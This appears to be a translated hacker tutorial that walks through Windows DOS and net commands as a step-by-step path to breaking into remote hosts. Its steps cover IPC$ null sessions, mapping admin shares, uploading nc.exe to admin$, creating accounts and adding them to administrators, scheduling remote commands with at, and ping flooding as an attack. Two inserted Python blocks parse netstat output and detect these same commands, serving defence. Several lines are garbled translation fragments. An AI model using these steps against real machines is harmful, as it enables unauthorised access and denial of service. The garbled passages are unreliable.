Common DOS commands for detecting network problems

One: ping command

I believe everyone is familiar with the ping command under Windows, but not many people get the most out of it. Of course, I'm not saying that ping can be pushed to its maximum; I just use the ping tool often and have summed up a few small tips, which I will share with you now.

Below I follow the help description of the ping command to explain the tricks I use with ping. Ping can only be used after the TCP/IP protocol is installed:

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

Options:

-t Ping the specified host until stopped. To see statistics and continue, type Control-Break; to stop, type Control-C.

Keeps pinging the host until you press Control-C.

This function has no special skills, but it can be used with other parameters, which will be mentioned below.

net use \\ip\ipc$ "" /user:"" establishes an IPC null connection.

net use \\ip\ipc$ "password" /user:"username" establishes a non-null IPC connection.

net use h: \\ip\c$ "password" /user:"username" logs in directly and maps the other party's C: to the local machine as H:.

net use h: \\ip\c$ after logging in, maps the other party's C: to the local machine as H:.

net use \\ip\ipc$ /del deletes the IPC connection.

net use h: /del deletes the mapping of the other party's drive to the local H:.

net user username password /add creates a user.

net user guest /active:yes activates the guest user.

net user shows which users exist.

net user accountname shows the properties of the account.

net localgroup administrators username /add adds "username" to the administrators group so that it has administrator rights. Note: administrator is followed by the plural s.

net start shows which services are running; net start servicename starts a service (such as net start telnet, net start schedule).

net stop servicename stops a service.

net time \\targetip checks the other party's time.

net time \\targetip /set synchronizes the local computer's time with that of the "target ip" host; adding the parameter /yes skips the confirmation prompt.

Check which shares are enabled in the local LAN.

net view \\ip shows which shares are enabled on the other party's LAN.

net config displays the system network settings.

net logoff disconnects shares.

net pause servicename pauses a service.

net send ip "text message" sends a message to the other party.

The network connection type and information are used for the network.

net share shows the local shares.

net share ipc$ opens the ipc$ share.

net share ipc$ /del deletes the ipc$ share.

net share c$ /del deletes the C: share.

net user guest 12345 logs in as guest and changes the password to 12345.

net password password changes the system login password.

netstat -a shows which ports are open; netstat -an is commonly used.

netstat -n shows the network connections of the ports; netstat -an is commonly used.

View the work in progress.

netstat -p protocolname, for example netstat -p tcp/ip, shows the usage of a protocol (here, the usage of the TCP/IP protocol).

netstat -s shows the usage of all the protocols in use.

nbtstat -A ip: if one of the other party's ports from 136 to 139 is open, you can view the user name that most recently logged in (the entry before 03 is the user name). Note: the parameter -A must be capitalized.

tracert -parameter ip (or computer name) traces the route (of packets); the parameter "-w number" sets the timeout interval.

ping ip (or domain name) sends data with a default size of 32 bytes to the other host. Parameters: "-l[space]packet size"; "-n number of times to send data"; "-t" means ping continuously.

Ping -t -l 65550 ip Ping of death (sending files larger than 64k and ping all the time becomes ping of death).

ipconfig (winipcfg) is used on Windows NT and XP (Windows 95/98) to view the local IP address.

ipconfig can display all configuration information with the parameter "/all".

tlist -t displays processes as a tree list (it is an additional tool of the system, which is not installed by default and is located in the support/tools folder of the installation directory).

kill -f processname: with the -f parameter, forces a process to end (it is an additional tool of the system and is not installed by default; it is in the support/tools folder of the installation directory).

del -f filename: with the -f parameter the file can be deleted. /ar, /ah, /as and /aa respectively mean deleting read-only, hidden, system and archive files. /a-r, /a-h, /a-s and /a-a mean deleting files other than read-only, hidden, system and archive files. For example, "del /ar *.*" means to delete all read-only files in the current directory, and "del /a-s *.*" means to delete all files except system files in the current directory.

Shutdown

The command is as follows:

shutdown.exe -a cancels the shutdown.

Turn it off.

shutdown.exe -f forces applications to close.

shutdown.exe -m \\computername controls a remote computer.

shutdown.exe -i displays a graphical user interface, but it must be the first parameter of shutdown.

shutdown.exe -l logs off the current user.

Shut down and restart.

Time sets the countdown to shutdown.

shutdown.exe -c "message content" sets the message shown in the shutdown dialog box (it cannot exceed 127 characters).

Two: Ping

It is a command to check whether the network is reachable and how fast the network connection is. As an administrator or hacker living on the network, the ping command is the first DOS command that must be mastered. The principle it uses is this: every machine on the network has a unique IP address. When we send a packet to the target IP address, the other party returns a packet of the same size. From the returned packet we can determine whether the target host exists and make a preliminary guess at the operating system of the target host. Let's take a look at some common operations. Look at the help first: type ping /? and press Enter to display the help screen. Here, we only need to master some basic and useful parameters (the same below).

-t means that packets keep being sent to the target IP until we force it to stop. Imagine, if you use 100M broadband access and the target IP is on a 56K modem, it won't be long before the target IP is disconnected because it can't carry so much data. Hehe, an attack is as simple as that.

-l defines the size of the sent packet, which is 32 bytes by default, and we can use it to define the maximum size as 65500 bytes. Combined with the -t parameter introduced above, the effect will be better.

-n defines the number of times packets are sent to the target IP, and the default is 3 times. If the network speed is slow, three times will waste us a lot of time, because now our purpose is only to judge whether the target IP exists, so we define it as once.

It should be noted that if the -t parameter and the -n parameter are used together, the ping command follows whichever parameter comes later. For example, with "ping IP -t -n 3", although the -t parameter is used, it does not ping continuously but only pings three times. In addition, the ping command does not have to ping an IP; it can also ping a host domain name directly, which gives you the IP of the host.

nbtstat

This command displays protocol statistics and current TCP/IP connections using NetBIOS over TCP/IP. With this command, you can get NetBIOS information of the remote host, such as user name, workgroup, MAC address of the network card, etc. It is necessary for us to know some basic parameters here.

-a With this parameter, you can get the NETBIOS information of the remote host as long as you know its machine name (the same below).

The -A parameter can also get NETBIOS information of the remote host, but you need to know its IP.

-n Lists the NETBIOS information of the local computer.

When we have the other party's IP or machine name, we can use the nbtstat command to get further information about it, which increases the safety factor of our intrusion.

netstat

This is a simple and powerful command to check the network status.

-a Check all the open ports of the local machine, which can effectively find and prevent Trojans and learn about the open services of the machine.

As you can see, there are FTP services, Telnet services, mail services, WEB services and so on in the local machine. Usage: netstat -a IP.

-r lists the current routing information and tells us the gateway and subnet mask of the local machine. Usage: netstat -r IP.
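
The check described above for netstat -a (finding unexpected open ports and learning which services a machine exposes) can be run over saved output. This is an added example in Python, not part of the original article: the sample output is constructed, and the REVIEW port list and its labels are this example's assumptions.

```python
import re

# Constructed sample of `netstat -an` output (not captured from a real host).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.0.5:139        0.0.0.0:0              LISTENING
  TCP    192.168.0.5:1042       192.168.0.7:23         ESTABLISHED
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING
  UDP    0.0.0.0:137            *:*
"""

# Ports worth a second look; this list and its labels are assumptions.
REVIEW = {21: "FTP (cleartext login)", 23: "Telnet (cleartext login)",
          135: "RPC endpoint mapper", 137: "NetBIOS name service",
          138: "NetBIOS datagram", 139: "NetBIOS session (IPC$/file shares)"}

LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")

def listeners(text):
    """Return (proto, address, port) for every listening socket, by port."""
    found = set()
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        proto, addr, port, _foreign, state = m.groups()
        # UDP rows have no State column; a bound UDP socket counts as listening.
        if state == "LISTENING" or (proto == "UDP" and state is None):
            found.add((proto, addr, int(port)))
    return sorted(found, key=lambda t: (t[2], t[0]))

def exposed(text):
    """Listeners on a reviewed port that other hosts can reach."""
    out = []
    for proto, addr, port in listeners(text):
        loopback = addr.startswith("127.") or addr == "[::1]"
        if port in REVIEW and not loopback:
            out.append((port, proto, REVIEW[port]))
    return out

if __name__ == "__main__":
    for port, proto, why in exposed(SAMPLE):
        print(f"{proto}/{port}: {why}")
```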

tracert

Traces routing information. Using this command, we can find all the hops through which data passes from the local machine to the target host, which is very helpful for understanding the network layout and structure.

That is to say, the data is transmitted from the local machine to the machine at 192.168.0.1 without any intermediate hop, which means that the two machines are on the same LAN. Usage: tracert IP

net

This command is the most important one in the network command, and we must thoroughly master the usage of each subcommand, because its function is very powerful. Here we focus on several commonly used subcommands.

net view

Use this command to view all shared resources of the remote host. The format of this command is net view \\IP.

net use

Maps a shared resource of a remote host to a local drive letter, which makes it convenient to use from the graphical interface, hehe. The format of this command is net use x: \\IP\sharename. The above one maps the share on the host with IP 192.168.0.5 to the local Z: drive. The following one establishes an IPC$ connection with 192.168.0.7 (net use \\IP\IPC$ "password" /user:"name").

After establishing the IPC$ connection, hehe, you can upload files: copy nc.exe \\192.168.0.7\admin$ transfers the nc.exe in the local directory to the remote host, and combined with other DOS commands to be introduced later, this realizes the intrusion.

Net start

Use it to start a service on a remote host. When you establish a connection with a remote host, what should you do if you find that any of its services are not started and you want to use that service? Just use this command to start it. Usage: net start servername, successfully started the telnet service.

net stop

What should I do if I find that a service of the remote host is in the way after the intrusion? Stop it with this command, and it's ok. Usage is the same as net start.

net user

Views information related to accounts, including creating new accounts, deleting accounts, viewing specific accounts, activating accounts, disabling accounts, etc. This is very beneficial to our intrusion, and most importantly, it provides a premise for us to clone accounts. Type net user without parameters to view all users, including those that have been disabled. Each usage is explained below.

1. net user abcd 1234 /add creates a new account with user name abcd and password 1234; by default it is a member of the user group.

2. net user abcd /del deletes the user whose user name is abcd.

3. net user abcd /active:no disables the user whose user name is abcd.

4. net user abcd /active:yes activates the user whose user name is abcd.

5. net user abcd views the user whose user name is abcd.

net localgroup

Views all information related to user groups and performs related operations. Type net localgroup without parameters to list all current user groups. In the process of intrusion, we usually use it to promote an account to the administrators group, so that we can use this account to control the entire remote host.

net time

This command checks the current time of the remote host. If your goal is only to get into a remote host, then you may not need this command. But once a simple intrusion has succeeded, is it only for a look? We need to penetrate further. For that we need to know the current time of the remote host, because the time, together with other means (mentioned later), makes it possible to start a command or program on a schedule, laying a good foundation for our further intrusion. Usage: net time \\IP.

at

The function of this command is to schedule the execution of specific commands and programs at a specific date or time (see the importance of net time?). When we know the current time of the remote host, we can use this command to make it execute a program or command at a later time (such as 2 minutes later). Usage: at time command \\computer.

It means that at 6:55, the computer named a-01 starts the telnet service (where net start telnet is the command to start the telnet service).
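
Seen from the defending side, the command sequence this section walks through (IPC$ connection, copy to admin$, net user /add, net localgroup administrators /add, at on a remote computer) can be matched in process-creation command lines. This is an added example in Python, not part of the original article: the rule names and the sample command lines are constructed, reusing the page's values where it gives them.

```python
import re

NET = r"\bnet1?(?:\.exe)?\s+"          # net.exe, or the net1.exe it spawns
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("ipc-null-session", NET + r'use\s+\\\\[^\\\s]+\\ipc\$\s+""\s*/user:\s*""'),
    ("admin-share-copy", r"\bcopy\s+\S+\s+\\\\[^\\\s]+\\(?:admin|[a-z])\$"),
    ("account-created",  NET + r"user\s+(?P<user>\S+)(?:\s+\S+)?\s+/add\b"),
    ("guest-activated",  NET + r"user\s+guest\s+/active:\s*yes\b"),
    ("admin-group-add",  NET + r"localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b"),
    ("remote-at-job",    r"\bat(?:\.exe)?\s+\\\\\S+\s+\d{1,2}:\d{2}\s+\S"),
]]

# Constructed command lines; "docs" is a made-up share name.
SAMPLE = [
    r'net use \\192.168.0.7\ipc$ "" /user:""',
    r"copy nc.exe \\192.168.0.7\admin$",
    r"net time \\192.168.0.7",
    r"at \\a-01 6:55 net start telnet",
    r"net user abcd 1234 /add",
    r"net localgroup administrators abcd /add",
    r"net user guest /active:yes",
    r"net use z: \\192.168.0.5\docs",      # ordinary drive mapping
    r"ping -n 1 192.168.0.7",
]

def scan(cmdlines):
    """Return (index, rule, match) for every rule hit, in input order."""
    hits = []
    for i, cmd in enumerate(cmdlines):
        for name, rx in RULES:
            m = rx.search(cmd)
            if m:
                hits.append((i, name, m))
    return hits

def promoted_accounts(cmdlines):
    """Accounts created and later added to administrators in the same stream."""
    created, promoted = set(), []
    for _, name, m in scan(cmdlines):
        if name == "account-created":
            created.add(m.group("user").lower())
        elif name == "admin-group-add" and m.group("user").lower() in created:
            promoted.append(m.group("user").lower())
    return promoted

if __name__ == "__main__":
    for i, name, _ in scan(SAMPLE):
        print(f"{name:18} {SAMPLE[i]}")
    print("created then promoted:", promoted_accounts(SAMPLE))
```

An account that is created and then added to administrators within one stream is a stronger signal than either command alone, which is why promoted_accounts correlates the two rules.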

ftp (abbreviation for File Transfer Protocol)

First, type ftp at the command line and press Enter, and an ftp prompt will appear. At this point, you can type "help" to view the help (any DOS command can use this method to view its help).

The first step is the login process, which uses open. Just type "open hostIP ftpport" at the ftp prompt and press Enter. The default port is generally 21, so it can be omitted. Then enter a legal user name and password to log in. Anonymous ftp is taken as the example here.

The user name and password are ftp, and the password is not displayed. When prompted * * * to log in, it means that the login is successful. Because this is an anonymous login, the user appears anonymous. Next, we will introduce the usage of specific commands.

dir, like the DOS command, is used to view the files on the server. Just type dir and press Enter to see the files on this ftp server.

cd enters a folder.

get downloads a file to the local machine.

Upload files to a remote server. It depends on whether the remote ftp server grants you write permission. If there is, hehe, I won't say much about how to use it. Let's play freely.

delete deletes files on the remote ftp server. This also requires that you have write permission.

bye exits the current connection.

quit Same as above.

telnet

A powerful remote login command that almost all intruders like to use, and it works well. Why? It is simple to operate, just like using your own machine. As long as you are familiar with DOS commands and have successfully connected to a remote machine as an administrator, you can use it to do anything you want. The following is how to use it. First, type telnet and press Enter, and then type help to view its help information.

Then type open IP at the prompt and press Enter, and the login window will appear, asking you to enter a legal user name and password. Any password entered here will not be displayed.

When the username and password are correct, the telnet connection is successfully established. At this point, you have the same permissions as this user on the remote host, and you can use DOS commands to do what you want.